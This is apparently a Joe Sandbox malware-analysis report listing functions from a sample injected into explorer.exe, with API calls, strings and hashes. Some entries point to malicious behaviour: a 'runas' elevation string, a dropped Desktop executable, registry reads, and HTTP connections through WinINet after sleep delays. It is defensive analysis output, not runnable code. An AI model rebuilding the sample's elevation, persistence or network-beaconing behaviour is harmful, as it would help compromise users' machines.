Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
String ID: runas
API String ID: 4065365256-4000483414
Opcode ID: b4739e7aacea21208afb77ea99f0ae80400174e951647e7fdb234ca974084b19
Instruction ID: f305d05508b70bc71c4d52d431cd12dfb52ff6beb832b2771ad5e387eb9a0bf7
Opcode Fuzzy Hash: b4739e7aacea21208afb77ea99f0ae80400174e951647e7fdb234ca974084b19
Instruction Fuzzy Hash: 34B12671A40208AFEB08DF28CC85B9DBBB6EF55788F508618F512973D1DBB5D9808F51

Function 02F0C6A4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,02F2B85D,02F0C69B,02F0AD34,02F07A49,F48E75C7,?,?,?,00000000,02F2C427,000000FF,?,02EE2576,?,?), ref: 02F0C6B2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02F0C6C0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02F0C6D9
SetLastError.KERNEL32(00000000,?,00000000,02F2C427,000000FF,?,02EE2576,?,?,0000000F,02EE3BA5,00000000,0000000F,00000000,02F2BDB0,000000FF), ref: 02F0C72B

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9daaa7dc1dd9b2896d42a474203231045854de54d3d1decefeb8fd1da3f3deb7
Instruction ID: 8f6601b8cb31ac07d422169e9f4b0669b580b7259d339436e7ba1b7d817435fa
Opcode Fuzzy Hash: 9daaa7dc1dd9b2896d42a474203231045854de54d3d1decefeb8fd1da3f3deb7
Instruction Fuzzy Hash: 87014736A0831D5FA62435F47CC49277AC6EB61BF5360033BF714812E0EF915811BA40

Function 02F1F0E9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, xrefs: 02F1F0EE

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
API String ID: 0-433915104
Opcode ID: c7f5dc878fd0c224952a58b45d5fe943e62412a51bc1b982eb183bb1537426eb
Instruction ID: 0ebaa0f276fa3e194c331ba8d31fc849131f13314b61fdf449e906c2740e1104
Opcode Fuzzy Hash: c7f5dc878fd0c224952a58b45d5fe943e62412a51bc1b982eb183bb1537426eb
Instruction Fuzzy Hash: 3A216272A00349AFFB20AE65CC80E6B77AEAF413E47944A19FA14E6550DB31DC51CB60

Function 02F0D6F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,02F0D7B8,?,?,00000000,?,?,02F0D86A,00000002,FlsGetValue,02F323E8,02F323F0,?), ref: 02F0D787

Strings

api-ms-, xrefs: 02F0D747

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: a67f2a2471b134b603b22aabeaecf67b145572f9edffeb63345d7c0f0d2e66a7
Instruction ID: 197aa242d85de2ec6f1b3631651fa02273e2ff06cb953c3f6297483312822281
Opcode Fuzzy Hash: a67f2a2471b134b603b22aabeaecf67b145572f9edffeb63345d7c0f0d2e66a7
Instruction Fuzzy Hash: F211A076E81229ABDF325AA89CC4B597794EF01BE0F150611EF11E72C0E770F900DAD0

Function 02F0DB92 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,02F0DB87,?,?,02F0DB4F,00000000,00000000,?), ref: 02F0DBA7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02F0DBBA
FreeLibrary.KERNEL32(00000000,?,?,02F0DB87,?,?,02F0DB4F,00000000,00000000,?), ref: 02F0DBDD

Strings

CorExitProcess, xrefs: 02F0DBB2
mscoree.dll, xrefs: 02F0DBA0

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 47569f4dd744d09e7216a96219a975b81907101b46f3e3e8ee6551b6a197dd81
Instruction ID: a24cb74bce445e021e654c1fbe5f27ac90c094c10b64a1153a2322428b5bc9b4
Opcode Fuzzy Hash: 47569f4dd744d09e7216a96219a975b81907101b46f3e3e8ee6551b6a197dd81
Instruction Fuzzy Hash: 0EF08230D41218FBEB119B90DD09F9DBBAAEB007DAF104065F901A2190DB70CE10EB90

Function 02F153C2 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

_free.LIBCMT ref: 02F156AD
_free.LIBCMT ref: 02F156C6
_free.LIBCMT ref: 02F15704
_free.LIBCMT ref: 02F1570D
_free.LIBCMT ref: 02F15719

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 3822dd802db1f03099378f546fd010bc9abd1497d3411e16a081acf2c062b0a3
Instruction ID: afe539c072e9e86b416e27491e80eea63d68193d8c54a3b0d6b4c9bc5073c7cd
Opcode Fuzzy Hash: 3822dd802db1f03099378f546fd010bc9abd1497d3411e16a081acf2c062b0a3
Instruction Fuzzy Hash: 30B14C75A012199FDB24DF18C894BA9B7B5FF48394F9045A9DA4AA7350D730AE90CF80

Function 02F14F37 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F17E35: RtlAllocateHeap.NTDLL(00000000,02F008E7,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F17E67

_free.LIBCMT ref: 02F15046
_free.LIBCMT ref: 02F1505D
_free.LIBCMT ref: 02F1507A
_free.LIBCMT ref: 02F15095
_free.LIBCMT ref: 02F150AC

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 6d841f5d03ca244328f26da859988517abcfc56a1792194b356a26daa18def07
Instruction ID: dab6bb05bb965624db5e7ee6bde47bebcf3420f00e7325014107784892643331
Opcode Fuzzy Hash: 6d841f5d03ca244328f26da859988517abcfc56a1792194b356a26daa18def07
Instruction Fuzzy Hash: 1851C572A00705AFEB21DF69CC81B6AB7F5FF887A0F940559E609E7250E731E940CB80

Function 02F06E00 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 02F06F89
__Mtx_unlock.LIBCPMT ref: 02F06F9A
__Cnd_broadcast.LIBCPMT ref: 02F06FC0
__Mtx_unlock.LIBCPMT ref: 02F06FC6
Concurrency::cancel_current_task.LIBCPMT ref: 02F0700F

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
String ID:
API String ID: 3354401312-0
Opcode ID: 32f121650979d0cad61b9b5bcad1c657f8bcecbdd0a4041c3af05e4838db66a6
Instruction ID: 3a0691e56ee58bd397e9c24a080242d80db043d5e0774079396cf1cf894ab418
Opcode Fuzzy Hash: 32f121650979d0cad61b9b5bcad1c657f8bcecbdd0a4041c3af05e4838db66a6
Instruction Fuzzy Hash: 5A618C70E02209DFDF10DFA4C984BAEBBB9BF04744F1441A9E905A7381DB35AA05DFA1

Function 02EEF280 Relevance: 7.7, APIs: 5, Instructions: 159comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02EEF317
CoCreateInstance.OLE32(02F3D05C,00000000,00000001,02F3D0BC,?), ref: 02EEF333
CoUninitialize.OLE32 ref: 02EEF341
CoUninitialize.OLE32 ref: 02EEF400
CoUninitialize.OLE32 ref: 02EEF414

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID:
API String ID: 1968832861-0
Opcode ID: 6836b3eaf2c1b79871b593b21ad6bd48200f9e6d16c4f93b6578254f95c29dc0
Instruction ID: bd514239faf3242f4f30b5b0b9140fceef1252dda98bc4ae070287c676db8cf6
Opcode Fuzzy Hash: 6836b3eaf2c1b79871b593b21ad6bd48200f9e6d16c4f93b6578254f95c29dc0
Instruction Fuzzy Hash: CD518E31A40208DFEF04DFA8CC84BDEBBBAEF48754F509519E906E7690D774A944CBA1

Function 02F04C00 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02F04C36
std::_Lockit::_Lockit.LIBCPMT ref: 02F04C56
std::_Lockit::~_Lockit.LIBCPMT ref: 02F04C76
std::_Facet_Register.LIBCPMT ref: 02F04D11
std::_Lockit::~_Lockit.LIBCPMT ref: 02F04D29

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 3f655e4261a0713896ac5456f121f2b44c2be5a31bea1b0756621c9dc32fc00b
Instruction ID: b763773755fd2ae38ed52406dd8f3520ed8d91c4278623dbdd00aa4832dfdf64
Opcode Fuzzy Hash: 3f655e4261a0713896ac5456f121f2b44c2be5a31bea1b0756621c9dc32fc00b
Instruction Fuzzy Hash: BC41BA75E402188BDB21DF94C880BAEB7F5FB14794F14856DDA06AB381DB70AD02DF90

Function 02F2095D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 02F20975

Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E

_free.LIBCMT ref: 02F20987
_free.LIBCMT ref: 02F20999
_free.LIBCMT ref: 02F209AB
_free.LIBCMT ref: 02F209BD

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 211124be680d7751b86cea03237cf9bf061447078b463677d267f8c19d83b306
Instruction ID: f2a6b429b208a853c09192aaecb09ff020fb98fad4760c7299f79910e5f3be7c
Opcode Fuzzy Hash: 211124be680d7751b86cea03237cf9bf061447078b463677d267f8c19d83b306
Instruction Fuzzy Hash: 87F04477D0521467D525FE64E5D0C19F3E9AA317D43E40C09E509E7700CB61F8808E94

Function 02EF94D0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,F48E75C7,00000000,?), ref: 02EF9509

Part of subcall function 02EEA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,F48E75C7,00000000,?), ref: 02EEA4BA

GetFileAttributesA.KERNEL32(?,?,00000000,00000000,02F46494,0000000E), ref: 02EF9585

Strings

2A==, xrefs: 02EF97F2, 02EFAE7B
4GBn, xrefs: 02EF97B8, 02EF9DA2, 02EF9DE9, 02EF9EC8

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AttributesFileFolderPathSleep
String ID: 2A==$4GBn
API String ID: 70540035-607253191
Opcode ID: 32dd5df24e6f52facfa3b7a6d4ede6e7e1cade0128ffa062f1241d8d43ae829d
Instruction ID: 7559b713989769516a822265c2722d5f2045a2c61f17f7c0d490b677ecaf9456
Opcode Fuzzy Hash: 32dd5df24e6f52facfa3b7a6d4ede6e7e1cade0128ffa062f1241d8d43ae829d
Instruction Fuzzy Hash: FAC1C030D0428CDFEF15DBA8C988BDDBFB6AF11308F608188D54567282C7B55A88DF61

Function 02F1EB24 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F1ECBE

Strings

*?, xrefs: 02F1EB67

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
Instruction ID: c9cb9f6a3e956c2e9f4adcc4e132c668850fdde233892d50de78689bcd2c5202
Opcode Fuzzy Hash: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
Instruction Fuzzy Hash: 48613AB6E002199FDB15DFA9C8809EEFBF5EF48350B6481AAD905E7340D771AA41CB90

Function 02EE4910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 02EE499F

Part of subcall function 02F0AD46: RaiseException.KERNEL32(E06D7363,00000001,00000003,02EE25DC,02F008E7,8B18EC83,?,02EE25DC,?,02F4357C), ref: 02F0ADA6

Strings

ios_base::badbit set, xrefs: 02EE4945
ios_base::failbit set, xrefs: 02EE494F
ios_base::eofbit set, xrefs: 02EE4954

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 3b0491e964f38344ca90d2161d0d2b382c469fd3054ceb33a9cd4b0d6b90b4f2
Instruction ID: 865dd1185e7f3e280a6a872e91e18147cdc0eca56888fa6e5b047104b6960920
Opcode Fuzzy Hash: 3b0491e964f38344ca90d2161d0d2b382c469fd3054ceb33a9cd4b0d6b90b4f2
Instruction Fuzzy Hash: 391103B1640749ABCB04DFA8C841B96F3E9BF51350F10C52AFA669B6C0EB70E900CF90

Function 02EF38A6 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 395sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6

Part of subcall function 02EF0370: Sleep.KERNELBASE(000005DC,F48E75C7,?,00000000), ref: 02EF0402
Part of subcall function 02EF0370: InternetOpenW.WININET(02F3CC08,00000000,00000000,00000000,00000000), ref: 02EF0411
Part of subcall function 02EF0370: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02EF0435
Part of subcall function 02EF0370: HttpOpenRequestA.WININET(?,00000000), ref: 02EF047F

Sleep.KERNEL32(000005DC), ref: 02EF3BE5

Strings

OnZp2OO6, xrefs: 02EF38EF
UQ==, xrefs: 02EF3916
UGQ+, xrefs: 02EF3BB8

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Open$InternetSleep$CloseConnectHttpQueryRequestValue
String ID: OnZp2OO6$UGQ+$UQ==
API String ID: 3034029558-1400716429
Opcode ID: b6ef3386361383d35b122811d988061929458d8e5a97344c2a513d00f8e75b26
Instruction ID: 60d086464a6795f0a63bea4f7ef4af5858dbe7464a2b3505f9a094a735e539eb
Opcode Fuzzy Hash: b6ef3386361383d35b122811d988061929458d8e5a97344c2a513d00f8e75b26
Instruction Fuzzy Hash: ADE15A719002889BEB18DB38CD8879DBF72AF42308F50C29CE5159B3C6E7759A84CF91

Function 02F18C15 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02F18C9F

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
Instruction ID: fa8eefd3c111f1c140d8431fc82cb732563631ff1b002fd91f43cda2c6abba70
Opcode Fuzzy Hash: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
Instruction Fuzzy Hash: D6B15972E012859FFB11CF68C980BEEBBF6EF553C4F9441AADA45AB241D3349941CB60

Function 02F0C7BB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 02F0C882
___AdjustPointer.LIBCMT ref: 02F0C8A5
___AdjustPointer.LIBCMT ref: 02F0C941

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 3d69cb35d8980570a57b3a0a16347bc290878ebac9dbd804cdb130f0a477ac7f
Instruction ID: a773188139b04f100d41ef15bd4452d8109bcc741171482761ebd74de4202f1f
